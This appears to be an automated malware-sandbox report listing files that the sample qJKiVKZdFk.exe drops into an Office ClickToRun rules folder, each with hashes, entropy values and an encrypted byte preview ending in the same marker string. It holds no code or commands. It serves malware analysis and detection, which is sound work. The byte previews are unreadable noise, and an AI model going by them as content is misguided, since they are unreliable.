                                                                                                                                      SHA-512:0E90C43C2C2003FD8B3AB4503B2D178496B5087A66522AE652A65E23EBB8912FE0081B145E2997CA205279F21365BFB72C1275DFA617C0015AA9B5053905A5E0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..\y.)...:7.. }.....%.Fg...|eb......W.%?J'l..l....Hw-.Ih..m0......!..c....$(g.9...b.../...^^.!.3...*.uAWI.)...k.~.Qm.2..U...=.....P..|...Y.....X.u........-..y.F.I..6..H....Z...s..Q..-.6....c.9W..(......l.1...c.}..o...Y..oapF..9.:..k..L..&z.=.k...]c.g{.L.8....\.|..u....].h....3.."Q..y.+T.....)...N.=k.R;...j...+.{.....'..mpu.;...9.H.o.}k.?..o.i..[.e...,.L..G%.3bd...e..2|YHq........ua.....CL..M..~\."..9.......+...... ...T....l.$BN..'...?4..$q..:./w...p.......gAS.<>...b.{.6h...}>....a.M..jw...Yi1.....D..L.j....K1.C9./H.....S..<].T*..(........-.../..@.OU.&3-.]...c..l....!0...$..8.....diF...y..%...|.9.K...f.ln. ..[...o..zg...j.... ...Z>.f..&.;.E.K...........2j...l.D....c......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120647v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):782
                                                                                                                                      Entropy (8bit):7.739001456152628
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:0Dsoj53Oc4uhS7XulSqfg0xIULF/wHPcjRJbD:ssK5evXz2g0xn4PcjD
                                                                                                                                      MD5:E37D30FA5A47C920C26C893782A88111
                                                                                                                                      SHA1:A0B9CBEA09631537BEB653B441FD6B76D8F41359
                                                                                                                                      SHA-256:0A291B4516C5C57296C89E6FA4FD2848C469A6CE53D88B3C91E0D19CB82845F3
                                                                                                                                      SHA-512:7DF842C453D63721BD282FF98AD0A16025B3E6375EA42F7C6111254A34C1E633405C008F83EE21518175A329B71A68C04F9EEAB077FC5BDFF1B48CA145CC7932
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?x...xf..`.W...LQ.'R.....N..xYNC..Id..%...pX@..|?...u...R....\"FR....%....2.R8....y.J...Q...G..<6.=L.4.....~.^...P.....vy....#N.g\....yJ......A.....R.v...d.M...C.....-....._:.tu....e.8@..!OL...0.X.....C4<.r.k.YU.r.5...:H..N....Z..w.Y..'e.h.S.?...>:.@.]M.U.....%.......N!..D>N..qY..u..r..#....$...T|.1.3.b.[.y.|.......W......!]s.;..`.$>.I.~....S.-..7fd.....<...5$K.1z.R...bi......`7u^@...WW].x.1(1.....07.MY,.....%..1..h.k.l.R$*.....<8s.\.UD....R...(.....c".m...e.v}..5..EfV.9......rY+.H....^.wV...)5........^L.*....R"e...k....8.j19...c.-.@c....b.(n.MIcJ.J...;(1...[....,E..*].._,.......<..>...fo!P......,..x....LG...."..!.i.O.D..E..(...b...H.V..+.9...8_....._w8tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120648v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):825
                                                                                                                                      Entropy (8bit):7.71295118849022
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:dnRijYUbhXV8akUovEst7N1KufgqaMLlPWR8SI30/llfMIJkShbEVT8nj3m7c+Ae:3AYa7oEsth8vkVWRLIsll0O6VInq3DbD
                                                                                                                                      MD5:AD68F18B15913DD5F42D09191B7F13BB
                                                                                                                                      SHA1:C207E39D9E8ED7E3D83ED92EDBB879DA41D5EEDB
                                                                                                                                      SHA-256:34C3B0F6E3979014B312C451AB25E73865F663C632E4F6EBD819BD249F9C2C19
                                                                                                                                      SHA-512:12CC3734D1A99DC4A13FA85022B326609B69CAD064DB560BFD9A2000A72631196A2871E5B233232BB55AA773D178BB07D60B9E024F62CF4D1DB0DF7B610CACDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?......R......R.0s..5%.....n....j.?.Qm.e.`..b.G.....q...7'...C.........T?&./...........@X.t.)...Y......$......:5..u.:e../....8.@.?.;..F4.8...0.9....t.n.#UN3.#{UjK.)f/G...'H-G......C]CZ......=Z.]....QN.<R,}.)..8....$..`.......QY.x'....0n?n.;...T........-..k<L...v#a...E...o..(P}..../..XY.L.<.....:.........2.v...bfxhxVc_..6..?...N.#...A..[3YN.+Z.1.Bnfy.x..o..A.o."........P.J.....0...._...}>.t.......3.'..ud<k-.....w.{.x..!.N....%.q..J..(F.?.;.o..'.w..fp...,ae.Eb'.ROW..G..=.<x..]..7..84.X.0.F{$....|..`?.Me......V....1;r).IW..x..CC.5\...P......)..JiE..K...(.....@).....G0.........NI.7...y....Z...JJ|5......}....L_.....u.I(.A...T.U_...M%.^B....r.V7A..{Nu| .....8.1..E.....G....)<..r..g.A.La..u&*...S.=tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120649v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):750
                                                                                                                                      Entropy (8bit):7.7336687983049295
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:PH81Czle2NwlmoBfPtsVAENz/Th4wXm5HnMU4oF04M0Fiz88s3hJ4kRd8v5PrmuV:vGC02NkJfxENrsVnqoy4M0is3hJ42mvX
                                                                                                                                      MD5:2B8BB985B48FE9F510C54730C97F3A27
                                                                                                                                      SHA1:7195346219C96BC50FE424A0303DC22DF4601ACC
                                                                                                                                      SHA-256:3B3EF0DF4181325A900D6AD7D900BC719AC903FBA43DD6362E5902E30A0CC8E2
                                                                                                                                      SHA-512:D90D93F23DF60846CD4659D883B5B86280B0D3BF00A454BB7586AFF61E7D5215989BBBCC83D752DB1DB36A2529FFF224E387D7A4E8D4EE639D11CC75FBB6E4E1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?i.._.7y$..,..\....Ez8p...B<.e"[.da$.W...y4:;~/.G.....E.%.]U...8A;..>.x..+(41.F.t...:..+...l\.1p..S.)..BW....gv7..W.F(.&...Bd.(....0-.'.!"..|M.Z....T}Ti.........J...$.....p.........g..z.Y^.p....a.Y..5..I......[......@.I...8r..3...*`..".A... ..%dM.2.j..f..].a>. }.A...7......C...ke.q.r..B.D.`...0.G5..`..&.=......XT..V..........l.....@....o!.{...Ik.......o.2{YQ...y. ..<P.q..wU.....-.x$..(.8...Qh.w... S............G...|.....p...F...{'.3.4...R.Y.B..f....83..B*.D#...u..I..g*..;K......0}.N`~f..d....N.h.+...[.Ien..c.&.N.K....%.s..7...p...6......O.Y.x?..|./.=...&.a...W.<.\.T.}.H"=c.QN.ND..3..-.K.G.@.ge...u.\z.2.=m..e.F...8AA.6..6$...NGn].d...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120650v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):813
                                                                                                                                      Entropy (8bit):7.732877400975271
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:3bWDkcMEWaUvS61HvIKiGPWZU/rALaxK6npAU+oT5QiJ6fQI30C0amC8m5HJX2bS:ikcvWZq6kU/rAYnOy68WQmfXqBlMbD
                                                                                                                                      MD5:9BC9248DA456513CC67CCE52BC0535B8
                                                                                                                                      SHA1:625275494103BF435A1A9197450CD3465AFF9EC4
                                                                                                                                      SHA-256:CD03429C14F43E518ACDB80D0C688E50E9C063115958D9CBA5FE3CBBB8F8A1F2
                                                                                                                                      SHA-512:6B7CFB75ED8BACCC52115E8C6AAE8398E247B5974D32BDB8B6AAD92CB1B7455B4E7E1C1FC98104F6CEE736B65E8B41BBBEAF8147F5F252374179889BF5E4F4CC
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.'....i.....?w..~8.....g .`..E.[..Y....k.5J.w.4.m.w^'.....i..S..{.W.w........=.X.....W...T.8.2..'.C...?.\s..r.....L!....lHY..8.........M.B}_..H...3.,n..j.?.@AV^.....6.Y+" .c8n.80K.+6.]..9n.O.s#.|..a..X..}_.W;....cv.....?u..H9}W'.%..."..#9..C.. ..fI.ma.2s...}4Z8.&..@.....}d...u,...*.[[L`.n.d.`..'....,........5.pL..)..1."<...S..I.z..<.#.3f....-.].?O...ze.....n....%6.N.LG.......W]......d=..Q.....Q.p..^\.....V. .o.Q.5%..#...@..G.g.j.....f.G.T.dU...".......S..6].!:......e.......s. ..w^.PQ............9.....GJ).u]h.+.Wa.y...!c....[..1...u.s\.G.. g.b.....t...L......#?..Qkt..K.H........9...,.HK......s...D4$...C.L.~^......S..x..5C.......{7.J.l6.....i#,.ui..>.*.s=.(g]).. D..I%... ]....%.a...xJ-tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120651v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):749
                                                                                                                                      Entropy (8bit):7.729450306020374
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:Wy9A6u0okeLoVf1bIk6xXeY/RX3nUIAKgZjkkRHzVFvn0asx+ukIcii9a:WyGiXbIzh/NNGkkRH0nZbD
                                                                                                                                      MD5:B9B8DE40C5F59EF311088F1CF3122694
                                                                                                                                      SHA1:C67FC30B72BB7B421CD5F791AE84D512B109B0BF
                                                                                                                                      SHA-256:068F0A19C7743141C02EE18A76542B875BA02213F061A22C7D849B69AE3BFCDA
                                                                                                                                      SHA-512:F20525984547F6512033A2EC9E4B060A7E553D59B59E438D11D30FAD96DBD33F14D212029FE9E986B179DF77DDC2534A4D7A2DF2CDF9F9294201B09F2B452AC6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?._..E...c.JD.7.....p.&..0.}...a/Lj......u..&..X..e<XdG....7o4.T...(.w"~-Y](..k.n....h..@....0#.J../)....lP.L...-....W.?..vZ..h.a.,.A.F..^4.q......[.N.I..Z..]...D...y.e....h...P8......5x. .8.[.. ...Z.M.........._..g..A........... .!p>.......Y...._.A,..Q..yH.A..Q ..ArVLG26lK0hb.+....&K.+.B.q..Yb..]...H}.jD..at[...............ws.....+.s.^by......n.z4...h......W..}.8O..6.. m%..`....;.r..s..XA...6v.c\G.i.'9.p..8..IY......Rvc54...g.........(c........'f..J.F..%..M...>.R.U.;A.3...n...P..;.dA./.}...,C.o?}it.^.y..w...M..s...4.t%.!8.......=8....5x..)....F$...4..@.-3......L....`....;.K...M.1.Z...Y.W.Qy....U..0g...[`..$?&.]}..|.5#.l.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120652v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):805
                                                                                                                                      Entropy (8bit):7.7414422804743355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:2K+tg5y5N2fvTJLiIxyaAtNIbxNeEAutdHqvB9YebFG/ukIcii9a:RR9uWyaAAvtdkYeb5bD
                                                                                                                                      MD5:3C013B2366276BC53A8FBB904DBECC3F
                                                                                                                                      SHA1:B841FE5C8980E32FDDAF1CC6108EC3158ABDF10B
                                                                                                                                      SHA-256:97F4294991709001B63D389A769A4D5F2D8250D8EFB038827CE95E5293A2088C
                                                                                                                                      SHA-512:4B1EC3E70EF80F6D828750FB2D9D814A9ED05E2C07FB296F679D6E5B340144CCCD9AE25315C809D99CAE7FEE21E3CB70864BD395FC4A5EABF346C6B028369EDA
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..f.f.e.'.M.b.....+... ..f.-....k.....x...k.A...B.wLF.5s... .<)...{.oz..;.Fj.........s.R..F.\.0.........&{/......u.F...?.zB.y...9...b..,............F...........C.-r.....`vV.?.=\=....r.......d...;....E...r(Y...G.,.mt.&2t`h.....vM..+...^...........)<u.....M..]*.<...8.`.2.)5F...$C...@...N....J.e...p.z)...yaI).*>...l......,~.%.:...3.+..<.0.)....gO..-.V>.C..w..q.D.d9.'r.DS.Lj.l2/...v...HK.V;...A......V...h.2<..].}qdL.....z.g.#2."...d.....`.e\)V..X.......h.`...+..m\.:....ew.x.j.W......0...I.V..W.1@Y/...x..c..2rav........u.....LR.l.!......V..BsO.Fb.........b..v..\./...(:.I....ya6...]}...#.....%...(./..U.c#.wp...F..q?.m.D.."..T.^.xE..>....A./Y6.....T..gS.T.NK4.....U#a.L..1#...{s..tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120653v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.753121925307842
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:xvkMP1i6yWQMFHoYLT1ZW2/HIwjPORlaazznyjaTcqTZ9+Tuk1djT7cwIokgoffR:xc2iZWJIYP7BIwjP4BznyjTqy1djT7cz
                                                                                                                                      MD5:ADCE69C338098A4815FC568817632FAF
                                                                                                                                      SHA1:6626FD1B1F7057659AB229EFBF5393FF11EC139A
                                                                                                                                      SHA-256:901FBA1105732BC54395C0637F4FA4BAD7AD635D6B9F744B7E3141414DC09B16
                                                                                                                                      SHA-512:DB7F7458AB49B8937A896D04BEDFBCE486554131B25A95E0F8B57F8C125D699A1DCA6694A46893248162BE5EC3329BCEF993A0E5047B02100D91DB6D7F5BAAED
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.r.'..8@.G.qA....5%;7..].l,)..0k$..*....Q.A..l..e..q..K.......{Pz]..,.a...D`..F.............CW..[o......3.j..{h...*J6V...@t.Ow...(t..:.....R.........&...9.0........My...2...O\9.p..W..$7.:....v..A.......h..la@..uT.%.F...r.x.\{.........F.. ........yX0..T..../k...l%...'.RR......g.j....H. .......(F.......NQ....=.M. Qz..-...s....1y/n......2..\~....d.......q..!.z6..'B.[....>au....]7~.eZ5B.d...C.E.../%................S./.n....Z_....6.I.-G...i.o..P.......i..l%.Bv..b..S...$.....}Q.yM.{.K..C......U....z.s.Y......`_Ag..Y6..Tq..}."s...q...v....s.kK....*%.....}H....<.....J.."....W4...K.T.?..4....4...K.........HTb..Pr.&,..?Stp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120654v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):811
                                                                                                                                      Entropy (8bit):7.745728238538145
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:8LF0Z+b0Qd9UE9In98VWtcTICntGdfUXbD:IqQE6VWtHfAD
                                                                                                                                      MD5:24409FFB38762233403310A5169E2BA1
                                                                                                                                      SHA1:6528ABE839F2E68E8F90FD6C0741F57DD2FA5803
                                                                                                                                      SHA-256:2CC70803F8607057ADFF6844128CA6B777DE51DD301B746B18D8CA8AC6185CDC
                                                                                                                                      SHA-512:4150E3D393136F8630068F3BB749330F1745DAB9E22B0C668D1923C06469C56D4AFE10BC03E028E6C9DEB65D5D570E4D4B0B34CF36C382A8722B7C2E01551AD2
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?l..|.X6P.gd._(s."I.9.U..LJ..s..`.A.V..H...c....eo.yi.EaF.@.:.w....c`Q..kP...nz9...t....N[.]...l%Z..Y.>..........k 8......i2..E:.,o...5..x|al....m.!..:.kv.%..A.._..T..(M..."T..I.+s...}....;.....$.nB...h.|.g...`..O..$.wp...R.....2.$...0.....A.7,z$...l6.u.<..G.gn.GG.T.B~...d.q..o.......*.t.gO*.....r..w.|../.T.;Daq.\......f.44......-...se..e.Q.]AS.......F..Z...^.bq....E......dq.N..c..m.....|:."..V.G-&.am...!..~.$4F.&..B.ci..d..].<./9.4h9......@....*......4-9>.i......(..iu.<..;.2]..Ba....*..o=].).Z.]p{.UX.=.m........c2.....%6.s.<.X.p.......<............. .#F..=...E...a.!.vOj.?...I#.J..Q......1..[....[*.F.C..-..UoP.|.v.^1.\l.S.@.e...uy=.U1.J.)W.~U..o...5n$}(..S....K..<.{.ITf.^O..n........tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120655v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.726549850677657
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:30hEIutGEHMHBGparbXGpKal0zKZjag0A71ZosVoxIg/4FZGFXRvOx78JkXEukIX:KOsH4pa/GpkKqe1oxIGhvOx7AkXfbD
                                                                                                                                      MD5:FEE740F54FB1E3503F66F01E6C5BD7C4
                                                                                                                                      SHA1:27F73BABEF2C3BBD104FBE212117C195F9CC7245
                                                                                                                                      SHA-256:0067F9AF3617106CD61CB17EB641E208F2B6A9AA0EE550AF289C0E3244EEBF6D
                                                                                                                                      SHA-512:83F946672EC2B0F50E840A3322E61D281C917E415FDC855062BB28AF3D79E2BE3B29F05DA866D23D4E2F2C27828CF6E58B1E9DC24B42EB1462E021F721233FBE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?.......3............T...h..Dg...)Po,....>{U.f.5...<.._.Pr.H.;.....4....ik...T.WQ....?........K,.?....)..d.G.%Ti....t3.e...n. y.....{.B.L..jn.(A...Bi...o....B..bJq.+.h9..,..hI....Iv.O.-gub9.....f....%...S...0..<AA^..K..W..."..8...Hw..Q{..41..:]..S..0U..L..q.t.Cs.zQ.H1X.G6|..L.|.7\..P..5.......t..^.U~..L..!D..M..B.X..gY#i.)6f......t.M._{.J5.N.....$..3....?.f....4.".WC....`.....1.X.PJ..f....s.....pM .,.......,.....M.${V%..!C.PK*"/...j..[.>yJ........X.A..q...tr/.Gn|.!L.+.r.V.... ....X.4...T..S.j..........#7.=.x).=..9vF./...M.eT..F#..pn.........".e&.).C.1..e>m,~X.'...kV?t.R.+PF9....&.*}6.A....FP......x....=.y.O.<I).<.<N.}....."..X..Q..vtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120656v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):811
                                                                                                                                      Entropy (8bit):7.691341021993284
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:+iXsayE0SPzGT9nqZhFurvfJuTNHh2+gBSATe8MsZ5hwIgHFG06Vz+tukIcii9a:ZX/JzGZ0hojfJu6biAZ5KNG06VzbD
                                                                                                                                      MD5:CF6B8D0109979EE31C58F1DF25BCD6F9
                                                                                                                                      SHA1:EE292C788F23E984B4FA2947B76B657AA3F22F86
                                                                                                                                      SHA-256:B3F076DD2D9E7048CBC30611C86EDA9EE7F7462231C8E4098ECD7A927E493C3A
                                                                                                                                      SHA-512:D90861487A91AADC2BEAE9B9FDF9777DDA9C2F7EC9C837E404411D02FB4D4C2EDAB6FE167DEF5B9840337DE7D9E79AA4DBC60CB89FF93E89D679222BAA40D0C6
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?. ....-^.K!.......m.$....9H$.....6.Z:..)c......].F.X}.`e(I...$i..p....|...48`.!..a...X1I.EA*..Y...0 0H...b.^....Q..}..P.|,..Z...v.....r.'.j!3fE..bB,..h=*......H.}Q......1E..D.+.p$....b..h.:*..Q-)......S..F,H5.#.hp....M......T.V>.E]....*DC.-.Q.5=.D...u/.:..{.$.0^.....;.DN..<b....3...i@s4.....<....&...#..R. ...r....#.....y-%R.....fh0.#:X.K.J.,.......p.d.. ..V.2[..PR.n...$.X..+........1..xH....Q5.W.b.z.u.e.4.)....8.aDh.a.....D.}{.3......g.....)...3.=*.{..SSJh._....K6#.um....p..u....&uIG......+.<.!.qIM_3b.7.X?F.1.M>dr6.2@4.V.8..X..]......s'U..L..!B...m.Y..,..M......K`...'AV.?.t73.?.*>.......j..9.|_....U<X.p:...|..u{..u..#p@E.)o.4........\*:.Q.U.<.K....pK4.....T8.M..HC..V|..[.V.B......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120657v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):753
                                                                                                                                      Entropy (8bit):7.721872110857015
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:HuUgDN7fMFUjxq6wHHy7njWVEHXchPNvzczfxrFdff8r8RY8JW3RSPukIcii9a:HufDrx0HS+4cDrcjfkQLcSUbD
                                                                                                                                      MD5:339F5FA7B216805A7F991ABCF7F70811
                                                                                                                                      SHA1:4F4FD880D220E8906108BEA4B7607113C3F941DC
                                                                                                                                      SHA-256:EEDD8EEC63315C6A93C5239DCA888CDBD0230D22FD99642B031539B333688755
                                                                                                                                      SHA-512:AF0C58D5EA40351DB91AE2B08021A07275EC2D1428B26A7442F67329D13929D738B2BB8EFFDC8B2DDDBBC15C54B4F9B84AC50ED935F6D390003D23491BB1E7AB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?c....u3XJ..D.'.P8.z"h.l.B!..$....w_5u........,.y.f.....&..A..z.I?f.Ma>....c6..TG".e..f.K?`..x.`...g.c.,./xZ...O.].l.L0`I3p...r..N..I1......V.E`..{...s?.PH./m.F......y...a%.....D...].!.].\...F9{..M.'C..Tlc.....7.&(+)km.O.V...3..)..M..PA.....k<..........B-..H%..4.W..p.......v.2.9..y..@...g`.....C_..,..9..R.....^V...>.Y;......pjO%..~.E....)!o.R......6....^|..0.o*&&8....yI.fwWZ........1{.-..|d.x._..L....?.AV(..P*..)...O..[.IY.*..>.........C......9..WE..e.z`tLk..*..........H.c..m......;.-..|`..W6Q{....g2...iX*.8.q|..w..!.:V...le..',.]L%Np.....$G9..+/q.......K.........S#..lE.../..I...'.k@.!#...Ei.2R....IR.$?..K..J...:Q..P....X@....\T.A{...NL....(tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120658v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):806
                                                                                                                                      Entropy (8bit):7.747216221221018
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:IRRWxWGkDjXK16NGWEw5WYEa5ZIEjdileWxnphFWlKt76W28wfuWEU4VW8JXlH+e:Ie4qQJ5Wxa5vEMWxVPt779wfwWS5bD
                                                                                                                                      MD5:F7F6AB4564AAE17CBE0911A499E2380E
                                                                                                                                      SHA1:AC434914FDBDFAD5AC0FF80D1A89333564D71240
                                                                                                                                      SHA-256:5EC1E3573A21688F2F36E7C275D5B3652A7C8D1144D13CADF82E08E6C20EC219
                                                                                                                                      SHA-512:E0D39B9846C1B79FEA449E5490EDA9DAC2C57C1F0B5C7DDC02DDC50DADB590F97509C282D8753654228DDC5C43951334843960A1C85F5EBD3294E3847BD508CE
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?h;o..P*8.zO{T.A..!_..9O.|A....m..,u.N....K........L.0JCE..&%.b......}.+.......g.q9.H....K.2.d.4.L&..0..."....1..ES-.Fx....a.5<....RwZ......W...}.l1~....z.C..M...VE..Z...bD..P..."..DKh.."...Oc..sZ.'...W7..$M...4.W.S.S.s..,G..1.........{U..Y.>A%3...e..].R0.?>..K..N.F%D.8..g..=8u..N<+...Gh)..........&....9..<...zP.,6Y..J....^k.Zy..[..$.P......[..E^....=.y;....Q....."@0.....H4A.......c.Li..7ij...Q/:xOG...X..%0T6.9.%.z.d.@..5\.D...^&..N..<./...j.\,=.*.,.9a.S2....OH.U ...#c..?....~:../.~..)....>..p..l....It.5..a.V.]A....*%...o^lB.c.....S"v.6...(.g.)q(.....F./....8...(...;g..Quk ~.:Q..90N..y.J#I.q...).Pj,..[.z......O....L-P.".E.......3e<7."..)..?j.s.........../..2*.3$w$..0.>c....j?.LE....tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120659v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):802
                                                                                                                                      Entropy (8bit):7.708524793052777
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:E1a6xG93w8Shl/JzjscUUE4BU09dEzxQbD:0xGtwhVjzdbe09dEgD
                                                                                                                                      MD5:8638B500642CB1BD3032E806149C39D0
                                                                                                                                      SHA1:9C4C21E3271FEC39984A9D42C01609B5F8C55960
                                                                                                                                      SHA-256:E1A72ACCFBD7965BB91CAD3A4791248E91B37C1F0D13325EAD191F14B73DC993
                                                                                                                                      SHA-512:42B47C9656520F1A0F3532D645B8D2CD2B1DA67EB9D29D058224339DC541BD17405EAB991DA5AF2109A31423B37613941191001293C0F54498085F9F8F635276
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.<?..........$.P[.uN}....4a.0......7yB.?...A..|..oz...]j..~.......BR.R0.L[Fa.[.;#...f...%.}.b'u....c...>%.1...f%6r.&.Z......P<..Vd.*f..A=.818..........Y..-......l.T-.....n!...>.9IRv.s...qc...r.....4".....L.^..m.]Bik..O.{.;..Y )..~....B.X.UT..xz1mU.8w....l.u..@.W.W.I.?%Ea..Lr.h.e.7<V|...v.Qf....Y.......B.....'.e5.qz...5M.....%k.}..,9..h..ERR.a..b.0b$......b...6.T..3....F\:*..P.....e@..u.!.5.............9.zZ.Ie.6.1....x.,{.:...z.*#HO...:..../.....{..A.........R...*viA....IO.(`...g.Y..A3.\&.h.w..''.d.b$..i.sb%.oBV..,....!..l.~ v^..H$..0....\.;.n......6.o.>;U...K..<..l......'.........a&E.u......w....>....:.!.X.:((...s..Z...I..I...]..\..n!...3$...*..R. ..Wr..}#2..Z...tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule120660v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):819
                                                                                                                                      Entropy (8bit):7.690643978106318
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:5dWwaPyMDDYtF+M046qRErOpqs8qyHEq1Jjhp/mgUbD:r392m+MgqR/ppxe1JjhpwD
